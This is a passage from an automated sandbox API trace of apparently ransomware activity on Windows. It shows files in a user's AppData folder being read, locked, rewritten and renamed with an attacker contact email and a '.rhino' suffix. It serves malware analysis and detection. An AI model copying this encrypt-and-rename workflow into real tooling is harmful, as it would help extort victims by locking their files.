(HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x76b450 [0086.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76bb30 | out: hHeap=0x6d0000) returned 1 [0086.583] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x73c0b8 [0086.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76b450 | out: hHeap=0x6d0000) returned 1 [0086.583] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x73ca20 [0086.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0086.584] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x73d838 [0086.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73ca20 | out: hHeap=0x6d0000) returned 1 [0086.584] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x73ed78 [0086.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73d838 | out: hHeap=0x6d0000) returned 1 [0086.584] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x740d40 [0086.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73ed78 | out: hHeap=0x6d0000) returned 1 [0086.586] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x73c0b8 [0086.586] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x740d40 | out: hHeap=0x6d0000) returned 1 [0086.586] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x740808 [0086.587] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0086.587] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x72bfe8 [0086.588] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x740808 | out: hHeap=0x6d0000) returned 1 [0086.588] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x73c0b8 [0086.588] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0086.588] WriteFile (in: hFile=0xec, lpBuffer=0x73c0c0*, nNumberOfBytesToWrite=0xc33a, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x73c0c0*, lpNumberOfBytesWritten=0x2cfa04*=0xc33a, lpOverlapped=0x0) returned 1 [0086.589] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0086.589] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xc33a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0086.589] CloseHandle (hObject=0xec) returned 1 [0086.590] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x76b1c0 [0086.590] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x76b450 [0086.590] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76b1c0 | out: hHeap=0x6d0000) returned 1 [0086.590] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LsgsrpB.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lsgsrpb.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LsgsrpB.mp3.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lsgsrpb.mp3.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0086.592] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76b450 | out: hHeap=0x6d0000) returned 1 [0086.592] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76b2c8 | out: hHeap=0x6d0000) returned 1 [0086.592] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.592] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0086.592] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0086.592] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x72a920 [0086.592] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75ef78 [0086.592] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0086.592] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.592] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.592] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LYE6oZz iVeG5QNBY.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lye6ozz iveg5qnby.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0086.593] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x8235 [0086.593] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x8355, nNumberOfBytesToLockHigh=0x0) returned 1 [0086.593] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.593] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0086.594] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.595] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x8235, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x8235, lpOverlapped=0x0) returned 1 [0086.595] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0086.595] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.596] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0086.596] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0086.596] GetLastError () returned 0x0 [0086.596] SetLastError (dwErrCode=0x0) [0086.596] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.596] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8258) returned 0x75ef78 [0086.596] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.596] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x7671d8 [0086.596] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x7672e0 [0086.596] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7671d8 | out: hHeap=0x6d0000) returned 1 [0086.596] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.596] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0086.596] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0086.596] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.596] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0086.596] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.596] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0086.597] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.597] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0086.597] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.597] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0086.597] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.597] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0086.597] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0086.597] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0086.597] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0086.597] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0086.597] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0086.597] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0086.597] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0086.597] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0086.597] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.597] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x72a920 [0086.597] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.597] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x7671d8 [0086.597] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0086.598] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x767468 [0086.598] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7671d8 | out: hHeap=0x6d0000) returned 1 [0086.598] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x767548 [0086.598] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x767468 | out: hHeap=0x6d0000) returned 1 [0086.598] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x767690 [0086.598] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x767548 | out: hHeap=0x6d0000) returned 1 [0086.598] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x767878 [0086.598] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x767690 | out: hHeap=0x6d0000) returned 1 [0086.598] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x767b48 [0086.598] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x767878 | out: hHeap=0x6d0000) returned 1 [0086.598] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x767468 [0086.598] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x767b48 | out: hHeap=0x6d0000) returned 1 [0086.601] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x767ab0 [0086.601] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x767468 | out: hHeap=0x6d0000) returned 1 [0086.601] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x768418 [0086.601] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x767ab0 | out: hHeap=0x6d0000) returned 1 [0086.601] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x769230 [0086.601] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x768418 | out: hHeap=0x6d0000) returned 1 [0086.601] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x73c0b8 [0086.602] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x769230 | out: hHeap=0x6d0000) returned 1 [0086.602] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x767468 [0086.602] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0086.602] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x73c0b8 [0086.602] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x767468 | out: hHeap=0x6d0000) returned 1 [0086.603] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x740808 [0086.604] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0086.604] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x72bfe8 [0086.605] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x740808 | out: hHeap=0x6d0000) returned 1 [0086.606] WriteFile (in: hFile=0xec, lpBuffer=0x72c000*, nNumberOfBytesToWrite=0x8355, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x72c000*, lpNumberOfBytesWritten=0x2cfa04*=0x8355, lpOverlapped=0x0) returned 1 [0086.606] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0086.606] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x8355, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0086.606] CloseHandle (hObject=0xec) returned 1 [0086.611] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0086.611] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x7671d8 [0086.611] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0086.611] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LYE6oZz iVeG5QNBY.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lye6ozz iveg5qnby.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LYE6oZz iVeG5QNBY.gif.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lye6ozz iveg5qnby.gif.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0086.615] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7671d8 | out: hHeap=0x6d0000) returned 1 [0086.615] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7672e0 | out: hHeap=0x6d0000) returned 1 [0086.615] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.615] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x72a920 [0086.615] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0086.615] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0086.615] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75ef78 [0086.616] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0086.616] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.616] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.616] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\l_BCBt53g.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\l_bcbt53g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0086.616] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x838c [0086.616] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x84ac, nNumberOfBytesToLockHigh=0x0) returned 1 [0086.616] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.616] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0086.617] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.618] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x838c, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x838c, lpOverlapped=0x0) returned 1 [0086.618] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0086.618] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.618] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0086.618] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0086.618] GetLastError () returned 0x0 [0086.618] SetLastError (dwErrCode=0x0) [0086.618] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.619] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x83af) returned 0x75ef78 [0086.619] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.619] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x767330 [0086.619] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x767438 [0086.619] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x767330 | out: hHeap=0x6d0000) returned 1 [0086.619] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.619] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0086.619] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0086.619] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.619] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0086.619] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.619] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0086.619] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.619] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0086.619] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.619] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0086.619] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.619] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0086.619] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0086.619] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0086.620] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0086.620] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0086.620] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0086.620] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0086.620] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0086.620] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0086.620] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.620] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0086.620] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.620] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x767330 [0086.620] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0086.620] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x7675c0 [0086.620] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x767330 | out: hHeap=0x6d0000) returned 1 [0086.620] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x7676a0 [0086.620] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7675c0 | out: hHeap=0x6d0000) returned 1 [0086.620] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x7677e8 [0086.620] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7676a0 | out: hHeap=0x6d0000) returned 1 [0086.620] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x7679d0 [0086.620] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7677e8 | out: hHeap=0x6d0000) returned 1 [0086.620] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x767ca0 [0086.620] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7679d0 | out: hHeap=0x6d0000) returned 1 [0086.620] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x7675c0 [0086.620] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x767ca0 | out: hHeap=0x6d0000) returned 1 [0086.621] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x767c08 [0086.621] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7675c0 | out: hHeap=0x6d0000) returned 1 [0086.621] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x768570 [0086.621] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x767c08 | out: hHeap=0x6d0000) returned 1 [0086.621] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x769388 [0086.621] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x768570 | out: hHeap=0x6d0000) returned 1 [0086.621] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x72bfe8 [0086.621] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x769388 | out: hHeap=0x6d0000) returned 1 [0086.621] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x7675c0 [0086.621] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0086.622] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x72bfe8 [0086.622] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7675c0 | out: hHeap=0x6d0000) returned 1 [0086.623] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x730738 [0086.623] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0086.623] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x73c0b8 [0086.624] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x730738 | out: hHeap=0x6d0000) returned 1 [0086.624] WriteFile (in: hFile=0xec, lpBuffer=0x73c0c0*, nNumberOfBytesToWrite=0x84ac, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x73c0c0*, lpNumberOfBytesWritten=0x2cfa04*=0x84ac, lpOverlapped=0x0) returned 1 [0086.625] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0086.625] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x84ac, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0086.625] CloseHandle (hObject=0xec) returned 1 [0086.628] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x767330 [0086.628] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x7675c0 [0086.629] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x767330 | out: hHeap=0x6d0000) returned 1 [0086.629] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\l_BCBt53g.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\l_bcbt53g.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS 